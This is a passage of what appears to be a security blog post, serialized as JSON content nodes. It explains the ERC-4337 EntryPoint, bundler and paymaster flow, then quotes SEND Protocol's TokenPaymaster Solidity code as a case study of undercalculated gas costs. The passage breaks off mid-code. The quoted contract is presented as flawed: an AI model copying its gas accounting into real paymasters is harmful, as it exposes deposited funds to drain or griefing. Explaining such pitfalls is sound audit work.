level:",{"type":26,"tag":35,"props":104743,"children":104744},{},[104745],{"type":26,"tag":2210,"props":104746,"children":104748},{"alt":53181,"src":104747},"/posts/paymasters-evm/flowchart.png",[],{"type":26,"tag":35,"props":104750,"children":104751},{},[104752],{"type":32,"value":104753},"The diagram above shows the key flow of ERC-4337. Below is a short explanation of each component shown above.",{"type":26,"tag":118,"props":104755,"children":104757},{"id":104756},"useroperation",[104758],{"type":26,"tag":130,"props":104759,"children":104761},{"className":104760},[],[104762],{"type":32,"value":104763},"UserOperation",{"type":26,"tag":35,"props":104765,"children":104766},{},[104767],{"type":32,"value":104768},"A UserOperation is a pseudo‑transaction object representing the user’s intent. It includes data like:",{"type":26,"tag":3426,"props":104770,"children":104771},{},[104772,104777,104782],{"type":26,"tag":3430,"props":104773,"children":104774},{},[104775],{"type":32,"value":104776},"Target contract call(s)",{"type":26,"tag":3430,"props":104778,"children":104779},{},[104780],{"type":32,"value":104781},"Signature or validation metadata",{"type":26,"tag":3430,"props":104783,"children":104784},{},[104785,104787,104793],{"type":32,"value":104786},"Gas limits and fee payment details (wallet address, paymaster, bundler)\n",{"type":26,"tag":130,"props":104788,"children":104790},{"className":104789},[],[104791],{"type":32,"value":104792},"UserOperations",{"type":32,"value":104794}," are submitted to a separate mempool (often called alt‑mempool), not the regular Ethereum transaction pool.",{"type":26,"tag":118,"props":104796,"children":104798},{"id":104797},"smart-contract-account",[104799],{"type":32,"value":104800},"Smart Contract Account",{"type":26,"tag":35,"props":104802,"children":104803},{},[104804,104806,104812,104813,104819],{"type":32,"value":104805},"Often called Sender or Smart Account, this is a user-controlled contract implementing logic via ",{"type":26,"tag":130,"props":104807,"children":104809},{"className":104808},[],[104810],{"type":32,"value":104811},"validateUserOp()",{"type":32,"value":3339},{"type":26,"tag":130,"props":104814,"children":104816},{"className":104815},[],[104817],{"type":32,"value":104818},"executeUserOp()",{"type":32,"value":104820},". It specifies custom rules: signature checking, nonce logic, allowed calls, or spending limits.",{"type":26,"tag":118,"props":104822,"children":104824},{"id":104823},"bundler",[104825],{"type":32,"value":104826},"Bundler",{"type":26,"tag":35,"props":104828,"children":104829},{},[104830,104832,104837,104839,104845],{"type":32,"value":104831},"A Bundler is an off‑chain service or node monitoring the alt‑mempool. It collects multiple ",{"type":26,"tag":130,"props":104833,"children":104835},{"className":104834},[],[104836],{"type":32,"value":104792},{"type":32,"value":104838},", packages them, and submits them in a single transaction to the ",{"type":26,"tag":130,"props":104840,"children":104842},{"className":104841},[],[104843],{"type":32,"value":104844},"EntryPoint",{"type":32,"value":104846}," contract. Bundlers must use an EOA to pay gas upfront and are later reimbursed.",{"type":26,"tag":118,"props":104848,"children":104849},{"id":17314},[104850],{"type":26,"tag":130,"props":104851,"children":104853},{"className":104852},[],[104854],{"type":32,"value":104844},{"type":26,"tag":35,"props":104856,"children":104857},{},[104858,104859,104864,104866,104871,104873,104877,104879,104884],{"type":32,"value":19206},{"type":26,"tag":130,"props":104860,"children":104862},{"className":104861},[],[104863],{"type":32,"value":104844},{"type":32,"value":104865}," contract acts as the central on-chain gateway for ERC-4337. For every batch of ",{"type":26,"tag":130,"props":104867,"children":104869},{"className":104868},[],[104870],{"type":32,"value":104792},{"type":32,"value":104872}," submitted by a ",{"type":26,"tag":84,"props":104874,"children":104875},{},[104876],{"type":32,"value":104826},{"type":32,"value":104878},", the ",{"type":26,"tag":130,"props":104880,"children":104882},{"className":104881},[],[104883],{"type":32,"value":104844},{"type":32,"value":104885}," validates and routes each operation back to the corresponding Smart Contract Wallet for execution.",{"type":26,"tag":35,"props":104887,"children":104888},{},[104889,104891,104896,104898,104902,104904,104909,104911,104917],{"type":32,"value":104890},"Once all operations have been processed, the ",{"type":26,"tag":130,"props":104892,"children":104894},{"className":104893},[],[104895],{"type":32,"value":104844},{"type":32,"value":104897}," calculates the total gas consumed and reimburses the ",{"type":26,"tag":84,"props":104899,"children":104900},{},[104901],{"type":32,"value":104826},{"type":32,"value":104903},". This payment can come either directly from the sender's Smart Account deposit in the ",{"type":26,"tag":130,"props":104905,"children":104907},{"className":104906},[],[104908],{"type":32,"value":104844},{"type":32,"value":104910}," or from a ",{"type":26,"tag":130,"props":104912,"children":104914},{"className":104913},[],[104915],{"type":32,"value":104916},"paymaster",{"type":32,"value":104918}," that has agreed to sponsor the transaction.",{"type":26,"tag":118,"props":104920,"children":104921},{"id":104916},[104922],{"type":26,"tag":130,"props":104923,"children":104925},{"className":104924},[],[104926],{"type":32,"value":104927},"Paymaster",{"type":26,"tag":35,"props":104929,"children":104930},{},[104931,104933,104938],{"type":32,"value":104932},"A ",{"type":26,"tag":130,"props":104934,"children":104936},{"className":104935},[],[104937],{"type":32,"value":104916},{"type":32,"value":104939}," is an optional smart contract that enables flexible gas payment options. It can either sponsor gas fees directly or allow users to pay gas using ERC-20 tokens instead of ETH. It runs two key functions:",{"type":26,"tag":3426,"props":104941,"children":104942},{},[104943,104954],{"type":26,"tag":3430,"props":104944,"children":104945},{},[104946,104952],{"type":26,"tag":130,"props":104947,"children":104949},{"className":104948},[],[104950],{"type":32,"value":104951},"validatePaymasterUserOp()",{"type":32,"value":104953}," to validate the operation. This can check sponsorship eligibility or verify that the user has sufficient ERC-20 token balance and allowance to cover gas costs. The exact implementation of the function depends on how the protocol implements it.",{"type":26,"tag":3430,"props":104955,"children":104956},{},[104957,104963],{"type":26,"tag":130,"props":104958,"children":104960},{"className":104959},[],[104961],{"type":32,"value":104962},"postOp()",{"type":32,"value":104964},", which handles post-execution accounting. For sponsored transactions, this may update internal accounting records, while for token payments, it typically finalizes any accounting related to the ERC-20 token payment.",{"type":26,"tag":35,"props":104966,"children":104967},{},[104968,104970,104975],{"type":32,"value":104969},"By supporting both sponsorship and token-based gas payments, ",{"type":26,"tag":130,"props":104971,"children":104973},{"className":104972},[],[104974],{"type":32,"value":104916},{"type":32,"value":104976}," removes the requirement for users to hold ETH, enabling truly gasless transactions through either model.",{"type":26,"tag":92,"props":104978,"children":104980},{"id":104979},"understanding-the-entrypoints-flow",[104981,104983,104988],{"type":32,"value":104982},"Understanding the ",{"type":26,"tag":130,"props":104984,"children":104986},{"className":104985},[],[104987],{"type":32,"value":104844},{"type":32,"value":104989},"'s Flow",{"type":26,"tag":35,"props":104991,"children":104992},{},[104993,104995,105000,105001,105006,105008,105019,105021,105026,105027,105032],{"type":32,"value":104994},"When a bundler submits ",{"type":26,"tag":130,"props":104996,"children":104998},{"className":104997},[],[104999],{"type":32,"value":104792},{"type":32,"value":19004},{"type":26,"tag":130,"props":105002,"children":105004},{"className":105003},[],[105005],{"type":32,"value":104844},{"type":32,"value":105007}," contract via ",{"type":26,"tag":41,"props":105009,"children":105012},{"href":105010,"rel":105011},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L58",[45],[105013],{"type":26,"tag":130,"props":105014,"children":105016},{"className":105015},[],[105017],{"type":32,"value":105018},"handleOps()",{"type":32,"value":105020},", the processing occurs in two main phases: ",{"type":26,"tag":84,"props":105022,"children":105023},{},[105024],{"type":32,"value":105025},"Validation",{"type":32,"value":3339},{"type":26,"tag":84,"props":105028,"children":105029},{},[105030],{"type":32,"value":105031},"Execution",{"type":32,"value":470},{"type":26,"tag":118,"props":105034,"children":105036},{"id":105035},"validation-phase",[105037],{"type":32,"value":105038},"Validation Phase",{"type":26,"tag":35,"props":105040,"children":105041},{},[105042,105044,105049,105051,105057,105059,105065,105066,105071],{"type":32,"value":105043},"In this phase, the ",{"type":26,"tag":130,"props":105045,"children":105047},{"className":105046},[],[105048],{"type":32,"value":104844},{"type":32,"value":105050}," first validates all operations in the submitted ",{"type":26,"tag":130,"props":105052,"children":105054},{"className":105053},[],[105055],{"type":32,"value":105056},"UserOps",{"type":32,"value":105058}," array before executing any of them. This ensures that only valid operations proceed to execution. For each ",{"type":26,"tag":130,"props":105060,"children":105062},{"className":105061},[],[105063],{"type":32,"value":105064},"UserOp",{"type":32,"value":104878},{"type":26,"tag":130,"props":105067,"children":105069},{"className":105068},[],[105070],{"type":32,"value":104844},{"type":32,"value":7072},{"type":26,"tag":4820,"props":105073,"children":105074},{},[105075,105093,105111,105132,105144],{"type":26,"tag":3430,"props":105076,"children":105077},{},[105078,105085,105087],{"type":26,"tag":41,"props":105079,"children":105082},{"href":105080,"rel":105081},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L764-L777",[45],[105083],{"type":32,"value":105084},"Calculates",{"type":32,"value":105086}," the required prefund amount by summing up all specified gas limits (verification, execution, and paymaster if used) multiplied by the user's specified ",{"type":26,"tag":130,"props":105088,"children":105090},{"className":105089},[],[105091],{"type":32,"value":105092},"maxFeePerGas",{"type":26,"tag":3430,"props":105094,"children":105095},{},[105096,105103,105104,105109],{"type":26,"tag":41,"props":105097,"children":105100},{"href":105098,"rel":105099},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L545-L553",[45],[105101],{"type":32,"value":105102},"Calls",{"type":32,"value":1011},{"type":26,"tag":130,"props":105105,"children":105107},{"className":105106},[],[105108],{"type":32,"value":104811},{"type":32,"value":105110}," on the sender's smart account contract to verify the operation's validity (e.g. checking signatures)",{"type":26,"tag":3430,"props":105112,"children":105113},{},[105114,105116,105123,105125,105130],{"type":32,"value":105115},"If no paymaster is specified, attempts to ",{"type":26,"tag":41,"props":105117,"children":105120},{"href":105118,"rel":105119},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L554-L557",[45],[105121],{"type":32,"value":105122},"deduct",{"type":32,"value":105124}," the prefund amount from the sender's ETH deposit in the ",{"type":26,"tag":130,"props":105126,"children":105128},{"className":105127},[],[105129],{"type":32,"value":104844},{"type":32,"value":105131}," (this can be partially refunded later if actual execution costs less)",{"type":26,"tag":3430,"props":105133,"children":105134},{},[105135,105142],{"type":26,"tag":41,"props":105136,"children":105139},{"href":105137,"rel":105138},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L785-L788",[45],[105140],{"type":32,"value":105141},"Validates",{"type":32,"value":105143}," the nonce to prevent replay attacks",{"type":26,"tag":3430,"props":105145,"children":105146},{},[105147,105149,105155,105157,105163,105164,105169],{"type":32,"value":105148},"If a paymaster is specified, it will ",{"type":26,"tag":41,"props":105150,"children":105153},{"href":105151,"rel":105152},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L623-L627",[45],[105154],{"type":32,"value":105122},{"type":32,"value":105156}," the required prefund amount from the paymaster's deposited ETH and then ",{"type":26,"tag":41,"props":105158,"children":105161},{"href":105159,"rel":105160},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L629",[45],[105162],{"type":32,"value":40892},{"type":32,"value":1011},{"type":26,"tag":130,"props":105165,"children":105167},{"className":105166},[],[105168],{"type":32,"value":104951},{"type":32,"value":105170}," on the paymaster contract to verify it will cover gas costs",{"type":26,"tag":35,"props":105172,"children":105173},{},[105174,105176,105181,105183,105188],{"type":32,"value":105175},"Only after all these validation checks pass will the ",{"type":26,"tag":130,"props":105177,"children":105179},{"className":105178},[],[105180],{"type":32,"value":104844},{"type":32,"value":105182}," move on to actually executing the ",{"type":26,"tag":130,"props":105184,"children":105186},{"className":105185},[],[105187],{"type":32,"value":104763},{"type":32,"value":105189},". This strict validation flow ensures that:",{"type":26,"tag":3426,"props":105191,"children":105192},{},[105193,105198,105203,105208],{"type":26,"tag":3430,"props":105194,"children":105195},{},[105196],{"type":32,"value":105197},"The operation is legitimate and authorized by the user",{"type":26,"tag":3430,"props":105199,"children":105200},{},[105201],{"type":32,"value":105202},"Sufficient funds are available to cover gas (either from user or paymaster)",{"type":26,"tag":3430,"props":105204,"children":105205},{},[105206],{"type":32,"value":105207},"The operation cannot be replayed",{"type":26,"tag":3430,"props":105209,"children":105210},{},[105211],{"type":32,"value":105212},"All involved contracts (sender and paymaster) have approved the execution",{"type":26,"tag":35,"props":105214,"children":105215},{},[105216],{"type":32,"value":105217},"This multi-layered validation approach is crucial for maintaining security when processing operations that can involve complex smart account logic and third-party gas sponsorship.",{"type":26,"tag":118,"props":105219,"children":105221},{"id":105220},"execution-phase",[105222],{"type":32,"value":105223},"Execution Phase",{"type":26,"tag":35,"props":105225,"children":105226},{},[105227,105229,105234,105236,105243,105245,105250],{"type":32,"value":105228},"After all operations have passed validation, the ",{"type":26,"tag":130,"props":105230,"children":105232},{"className":105231},[],[105233],{"type":32,"value":104844},{"type":32,"value":105235}," begins the ",{"type":26,"tag":41,"props":105237,"children":105240},{"href":105238,"rel":105239},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L70-L72",[45],[105241],{"type":32,"value":105242},"execution",{"type":32,"value":105244}," phase, processing each ",{"type":26,"tag":130,"props":105246,"children":105248},{"className":105247},[],[105249],{"type":32,"value":104763},{"type":32,"value":105251}," individually. For each operation, the flow is:",{"type":26,"tag":4820,"props":105253,"children":105254},{},[105255,105315,105361],{"type":26,"tag":3430,"props":105256,"children":105257},{},[105258,105259,105264,105266,105272,105273,105279,105281],{"type":32,"value":19206},{"type":26,"tag":130,"props":105260,"children":105262},{"className":105261},[],[105263],{"type":32,"value":104844},{"type":32,"value":105265}," makes a ",{"type":26,"tag":41,"props":105267,"children":105270},{"href":105268,"rel":105269},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L213-L232",[45],[105271],{"type":32,"value":40892},{"type":32,"value":59377},{"type":26,"tag":130,"props":105274,"children":105276},{"className":105275},[],[105277],{"type":32,"value":105278},"innerHandleOp()",{"type":32,"value":105280},", which:\n",{"type":26,"tag":3426,"props":105282,"children":105283},{},[105284,105296,105301],{"type":26,"tag":3430,"props":105285,"children":105286},{},[105287,105294],{"type":26,"tag":41,"props":105288,"children":105291},{"href":105289,"rel":105290},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L403",[45],[105292],{"type":32,"value":105293},"Forwards",{"type":32,"value":105295}," the operation to the sender's smart account contract",{"type":26,"tag":3430,"props":105297,"children":105298},{},[105299],{"type":32,"value":105300},"Executes the intended transaction(s) within the smart account",{"type":26,"tag":3430,"props":105302,"children":105303},{},[105304,105306,105313],{"type":32,"value":105305},"Handles ",{"type":26,"tag":41,"props":105307,"children":105310},{"href":105308,"rel":105309},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L821",[45],[105311],{"type":32,"value":105312},"post-execution",{"type":32,"value":105314}," tasks and cleanup",{"type":26,"tag":3430,"props":105316,"children":105317},{},[105318,105320,105326,105328,105334,105335,105341,105343],{"type":32,"value":105319},"If a paymaster was used, ",{"type":26,"tag":130,"props":105321,"children":105323},{"className":105322},[],[105324],{"type":32,"value":105325},"Entrypoint",{"type":32,"value":105327}," will ",{"type":26,"tag":41,"props":105329,"children":105332},{"href":105330,"rel":105331},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L848-L857",[45],[105333],{"type":32,"value":40892},{"type":32,"value":1011},{"type":26,"tag":130,"props":105336,"children":105338},{"className":105337},[],[105339],{"type":32,"value":105340},"paymaster.postOp()",{"type":32,"value":105342}," to:\n",{"type":26,"tag":3426,"props":105344,"children":105345},{},[105346,105351,105356],{"type":26,"tag":3430,"props":105347,"children":105348},{},[105349],{"type":32,"value":105350},"Allow paymaster to finalize its accounting",{"type":26,"tag":3430,"props":105352,"children":105353},{},[105354],{"type":32,"value":105355},"Process any refunds or additional charges",{"type":26,"tag":3430,"props":105357,"children":105358},{},[105359],{"type":32,"value":105360},"Complete any paymaster-specific logic",{"type":26,"tag":3430,"props":105362,"children":105363},{},[105364,105366,105371,105372,105379,105381],{"type":32,"value":105365},"Finally, after all operations are processed, the ",{"type":26,"tag":130,"props":105367,"children":105369},{"className":105368},[],[105370],{"type":32,"value":104844},{"type":32,"value":1011},{"type":26,"tag":41,"props":105373,"children":105376},{"href":105374,"rel":105375},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L74",[45],[105377],{"type":32,"value":105378},"compensates",{"type":32,"value":105380}," the bundler for:\n",{"type":26,"tag":3426,"props":105382,"children":105383},{},[105384,105389,105394],{"type":26,"tag":3430,"props":105385,"children":105386},{},[105387],{"type":32,"value":105388},"Gas costs from executing all operations",{"type":26,"tag":3430,"props":105390,"children":105391},{},[105392],{"type":32,"value":105393},"Overhead from submitting the batch transaction",{"type":26,"tag":3430,"props":105395,"children":105396},{},[105397],{"type":32,"value":105398},"Any unused gas, which is refunded",{"type":26,"tag":35,"props":105400,"children":105401},{},[105402],{"type":32,"value":105403},"This execution flow ensures secure and atomic operation execution, accurate tracking and settlement of gas costs, support for custom paymaster payment logic, and proper compensation for bundlers who provide the transaction submission service.",{"type":26,"tag":35,"props":105405,"children":105406},{},[105407,105409,105414,105416,105422,105424,105429],{"type":32,"value":105408},"Now that we understand how the ",{"type":26,"tag":130,"props":105410,"children":105412},{"className":105411},[],[105413],{"type":32,"value":104844},{"type":32,"value":105415}," works at a high level, let's examine how some protocols have failed to properly implement ",{"type":26,"tag":130,"props":105417,"children":105419},{"className":105418},[],[105420],{"type":32,"value":105421},"paymasters",{"type":32,"value":105423}," that align with the ",{"type":26,"tag":130,"props":105425,"children":105427},{"className":105426},[],[105428],{"type":32,"value":104844},{"type":32,"value":105430},"'s execution model, leading to potential vulnerabilities.",{"type":26,"tag":27,"props":105432,"children":105434},{"id":105433},"common-pitfalls-in-paymaster-implementation",[105435],{"type":32,"value":105436},"Common Pitfalls in Paymaster Implementation",{"type":26,"tag":35,"props":105438,"children":105439},{},[105440,105442,105447],{"type":32,"value":105441},"While paymasters offer powerful flexibility, they also introduce new complexity, and with it, room for subtle bugs. Missteps in paymaster design can not only break gas sponsorship flows, but also expose their deposited ETH in the ",{"type":26,"tag":130,"props":105443,"children":105445},{"className":105444},[],[105446],{"type":32,"value":104844},{"type":32,"value":105448}," to exploitation or griefing.",{"type":26,"tag":35,"props":105450,"children":105451},{},[105452,105454,105459],{"type":32,"value":105453},"In this section, we’ll walk through the ",{"type":26,"tag":84,"props":105455,"children":105456},{},[105457],{"type":32,"value":105458},"two most common pitfalls",{"type":32,"value":105460}," we’ve observed in real-world paymaster implementations:",{"type":26,"tag":92,"props":105462,"children":105464},{"id":105463},"undercalculated-gas-costs",[105465],{"type":26,"tag":84,"props":105466,"children":105467},{},[105468],{"type":32,"value":105469},"Undercalculated Gas Costs",{"type":26,"tag":35,"props":105471,"children":105472},{},[105473,105475,105480,105482,105487,105489,105494,105496,105503],{"type":32,"value":105474},"To understand this issue, let's first examine how gas penalties work in the ",{"type":26,"tag":130,"props":105476,"children":105478},{"className":105477},[],[105479],{"type":32,"value":104844},{"type":32,"value":105481},". When a ",{"type":26,"tag":130,"props":105483,"children":105485},{"className":105484},[],[105486],{"type":32,"value":104763},{"type":32,"value":105488}," specifies an execution gas limit higher than what's actually used during execution, the ",{"type":26,"tag":130,"props":105490,"children":105492},{"className":105491},[],[105493],{"type":32,"value":104844},{"type":32,"value":105495}," charges a ",{"type":26,"tag":41,"props":105497,"children":105500},{"href":105498,"rel":105499},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L718-L728",[45],[105501],{"type":32,"value":105502},"penalty of 10%",{"type":32,"value":105504}," of the unused gas. This penalty is paid to the bundler and is deducted from either the user's deposit (for regular transactions) or the paymaster's deposit (when using a paymaster).",{"type":26,"tag":35,"props":105506,"children":105507},{},[105508],{"type":32,"value":105509},"Now, let's examine a real-world example of how this penalty mechanism could impact paymasters. The SEND Protocol's paymaster implementation provides an instructive case study:",{"type":26,"tag":5512,"props":105511,"children":105513},{"className":7055,"code":105512,"language":7054,"meta":7,"style":7},"contract TokenPaymaster is BasePaymaster, UniswapHelper, OracleHelper {\n[...]\n    function _validatePaymasterUserOp(PackedUserOperation calldata userOp, bytes32, uint256 requiredPreFund)\n        internal\n        override\n        returns (bytes memory context, uint256 validationResult)\n    {\n        unchecked {\n            uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n            uint256 baseFee = tokenPaymasterConfig.baseFee;\n            uint256 dataLength = userOp.paymasterAndData.length - PAYMASTER_DATA_OFFSET;\n            require(dataLength == 0 || dataLength == 32, \"TPM: invalid data length\");\n            uint256 maxFeePerGas = userOp.unpackMaxFeePerGas();\n            uint256 refundPostopCost = tokenPaymasterConfig.refundPostopCost;\n            require(refundPostopCost \u003C userOp.unpackPostOpGasLimit(), \"TPM: postOpGasLimit too low\");\n            uint256 preChargeNative = requiredPreFund + (refundPostopCost * maxFeePerGas);\n            // note: price is in native-asset-per-token increasing it means dividing it by markup\n            uint256 cachedPriceWithMarkup = cachedPrice * DENOM / priceMarkup;\n            if (dataLength == 32) {\n                uint256 clientSuppliedPrice =\n                    uint256(bytes32(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET:PAYMASTER_DATA_OFFSET + 32]));\n                if (clientSuppliedPrice \u003C cachedPriceWithMarkup) {\n                    // note: smaller number means 'more native asset per token'\n                    cachedPriceWithMarkup = clientSuppliedPrice;\n                }\n            }\n            uint256 tokenAmount = weiToToken(preChargeNative, cachedPriceWithMarkup);\n            tokenAmount += baseFee;\n            SafeERC20.safeTransferFrom(token, userOp.sender, address(this), tokenAmount);\n            context = abi.encode(tokenAmount, userOp.sender);\n            validationResult =\n                _packValidationData(false, uint48(cachedPriceTimestamp + tokenPaymasterConfig.priceMaxAge), 0);\n        }\n    }\n[...]\n    function _postOp(PostOpMode, bytes calldata context, uint256 actualGasCost, uint256 actualUserOpFeePerGas)\n        internal\n        override\n    {\n        unchecked {\n            uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n            uint256 baseFee = tokenPaymasterConfig.baseFee;\n            (uint256 preCharge, address userOpSender) = abi.decode(context, (uint256, address));\n            preCharge -= baseFee; // don't refund the base fee\n            uint256 _cachedPrice = updateCachedPrice(false);\n            // note: price is in native-asset-per-token increasing it means dividing it by markup\n            uint256 cachedPriceWithMarkup = _cachedPrice * DENOM / priceMarkup;\n            // Refund tokens based on actual gas cost\n            uint256 actualChargeNative = actualGasCost + tokenPaymasterConfig.refundPostopCost * actualUserOpFeePerGas;\n            uint256 actualTokenNeeded = weiToToken(actualChargeNative, cachedPriceWithMarkup);\n            if (preCharge > actualTokenNeeded) {\n                // If initially provided token amount is greater than the actual amount needed, refund the difference\n                SafeERC20.safeTransfer(token, userOpSender, preCharge - actualTokenNeeded);\n            } else if (preCharge \u003C actualTokenNeeded) {\n                // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n                // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n                SafeERC20.safeTransferFrom(token, userOpSender, address(this), actualTokenNeeded - preCharge);\n            }\n\n            if (baseFee > 0) {\n                SafeERC20.safeTransfer(token, tokenPaymasterConfig.rewardsPool, baseFee);\n            }\n\n            emit UserOperationSponsored(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n            refillEntryPointDeposit(_cachedPrice);\n        }\n    }\n}\n",[105514],{"type":26,"tag":130,"props":105515,"children":105516},{"__ignoreMap":7},[105517,105561,105568,105625,105633,105641,105683,105690,105702,105724,105745,105775,105826,105856,105877,105915,105954,105971,106010,106034,106051,106094,106116,106133,106150,106157,106164,106190,106207,106242,106273,106285,106332,106339,106346,106353,106420,106427,106434,106441,106452,106471,106490,106554,106577,106610,106625,106660,106668,106707,106732,106753,106761,106788,106815,106823,106831,106873,106880,106887,106911,106927,106934,106941,106959,106972,106979,106987],{"type":26,"tag":137,"props":105518,"children":105519},{"class":5559,"line":5560},[105520,105524,105529,105534,105539,105543,105548,105552,105557],{"type":26,"tag":137,"props":105521,"children":105522},{"style":5573},[105523],{"type":32,"value":92416},{"type":26,"tag":137,"props":105525,"children":105526},{"style":6009},[105527],{"type":32,"value":105528}," TokenPaymaster",{"type":26,"tag":137,"props":105530,"children":105531},{"style":5573},[105532],{"type":32,"value":105533}," is",{"type":26,"tag":137,"props":105535,"children":105536},{"style":6009},[105537],{"type":32,"value":105538}," BasePaymaster",{"type":26,"tag":137,"props":105540,"children":105541},{"style":5601},[105542],{"type":32,"value":1108},{"type":26,"tag":137,"props":105544,"children":105545},{"style":6009},[105546],{"type":32,"value":105547},"UniswapHelper",{"type":26,"tag":137,"props":105549,"children":105550},{"style":5601},[105551],{"type":32,"value":1108},{"type":26,"tag":137,"props":105553,"children":105554},{"style":6009},[105555],{"type":32,"value":105556},"OracleHelper",{"type":26,"tag":137,"props":105558,"children":105559},{"style":5601},[105560],{"type":32,"value":5875},{"type":26,"tag":137,"props":105562,"children":105563},{"class":5559,"line":5412},[105564],{"type":26,"tag":137,"props":105565,"children":105566},{"style":5601},[105567],{"type":32,"value":12908},{"type":26,"tag":137,"props":105569,"children":105570},{"class":5559,"line":5417},[105571,105575,105580,105584,105589,105594,105599,105603,105608,105612,105616,105621],{"type":26,"tag":137,"props":105572,"children":105573},{"style":5573},[105574],{"type":32,"value":92433},{"type":26,"tag":137,"props":105576,"children":105577},{"style":5682},[105578],{"type":32,"value":105579}," _validatePaymasterUserOp",{"type":26,"tag":137,"props":105581,"children":105582},{"style":5601},[105583],{"type":32,"value":165},{"type":26,"tag":137,"props":105585,"children":105586},{"style":5573},[105587],{"type":32,"value":105588},"PackedUserOperation",{"type":26,"tag":137,"props":105590,"children":105591},{"style":5573},[105592],{"type":32,"value":105593}," calldata",{"type":26,"tag":137,"props":105595,"children":105596},{"style":5584},[105597],{"type":32,"value":105598}," userOp",{"type":26,"tag":137,"props":105600,"children":105601},{"style":5601},[105602],{"type":32,"value":1108},{"type":26,"tag":137,"props":105604,"children":105605},{"style":6009},[105606],{"type":32,"value":105607},"bytes32",{"type":26,"tag":137,"props":105609,"children":105610},{"style":5601},[105611],{"type":32,"value":1108},{"type":26,"tag":137,"props":105613,"children":105614},{"style":6009},[105615],{"type":32,"value":48770},{"type":26,"tag":137,"props":105617,"children":105618},{"style":5584},[105619],{"type":32,"value":105620}," requiredPreFund",{"type":26,"tag":137,"props":105622,"children":105623},{"style":5601},[105624],{"type":32,"value":5742},{"type":26,"tag":137,"props":105626,"children":105627},{"class":5559,"line":5642},[105628],{"type":26,"tag":137,"props":105629,"children":105630},{"style":5573},[105631],{"type":32,"value":105632},"        internal\n",{"type":26,"tag":137,"props":105634,"children":105635},{"class":5559,"line":5745},[105636],{"type":26,"tag":137,"props":105637,"children":105638},{"style":5573},[105639],{"type":32,"value":105640},"        override\n",{"type":26,"tag":137,"props":105642,"children":105643},{"class":5559,"line":5850},[105644,105649,105653,105657,105662,105666,105670,105674,105679],{"type":26,"tag":137,"props":105645,"children":105646},{"style":5610},[105647],{"type":32,"value":105648},"        returns",{"type":26,"tag":137,"props":105650,"children":105651},{"style":5601},[105652],{"type":32,"value":4625},{"type":26,"tag":137,"props":105654,"children":105655},{"style":6009},[105656],{"type":32,"value":86430},{"type":26,"tag":137,"props":105658,"children":105659},{"style":5573},[105660],{"type":32,"value":105661}," memory",{"type":26,"tag":137,"props":105663,"children":105664},{"style":5584},[105665],{"type":32,"value":78943},{"type":26,"tag":137,"props":105667,"children":105668},{"style":5601},[105669],{"type":32,"value":1108},{"type":26,"tag":137,"props":105671,"children":105672},{"style":6009},[105673],{"type":32,"value":48770},{"type":26,"tag":137,"props":105675,"children":105676},{"style":5584},[105677],{"type":32,"value":105678}," validationResult",{"type":26,"tag":137,"props":105680,"children":105681},{"style":5601},[105682],{"type":32,"value":5742},{"type":26,"tag":137,"props":105684,"children":105685},{"class":5559,"line":5878},[105686],{"type":26,"tag":137,"props":105687,"children":105688},{"style":5601},[105689],{"type":32,"value":31781},{"type":26,"tag":137,"props":105691,"children":105692},{"class":5559,"line":5891},[105693,105698],{"type":26,"tag":137,"props":105694,"children":105695},{"style":5610},[105696],{"type":32,"value":105697},"        unchecked",{"type":26,"tag":137,"props":105699,"children":105700},{"style":5601},[105701],{"type":32,"value":5875},{"type":26,"tag":137,"props":105703,"children":105704},{"class":5559,"line":5909},[105705,105710,105715,105719],{"type":26,"tag":137,"props":105706,"children":105707},{"style":6009},[105708],{"type":32,"value":105709},"            uint256",{"type":26,"tag":137,"props":105711,"children":105712},{"style":5601},[105713],{"type":32,"value":105714}," priceMarkup ",{"type":26,"tag":137,"props":105716,"children":105717},{"style":5590},[105718],{"type":32,"value":289},{"type":26,"tag":137,"props":105720,"children":105721},{"style":5601},[105722],{"type":32,"value":105723}," tokenPaymasterConfig.priceMarkup;\n",{"type":26,"tag":137,"props":105725,"children":105726},{"class":5559,"line":5930},[105727,105731,105736,105740],{"type":26,"tag":137,"props":105728,"children":105729},{"style":6009},[105730],{"type":32,"value":105709},{"type":26,"tag":137,"props":105732,"children":105733},{"style":5601},[105734],{"type":32,"value":105735}," baseFee ",{"type":26,"tag":137,"props":105737,"children":105738},{"style":5590},[105739],{"type":32,"value":289},{"type":26,"tag":137,"props":105741,"children":105742},{"style":5601},[105743],{"type":32,"value":105744}," tokenPaymasterConfig.baseFee;\n",{"type":26,"tag":137,"props":105746,"children":105747},{"class":5559,"line":5939},[105748,105752,105757,105761,105766,105770],{"type":26,"tag":137,"props":105749,"children":105750},{"style":6009},[105751],{"type":32,"value":105709},{"type":26,"tag":137,"props":105753,"children":105754},{"style":5601},[105755],{"type":32,"value":105756}," dataLength 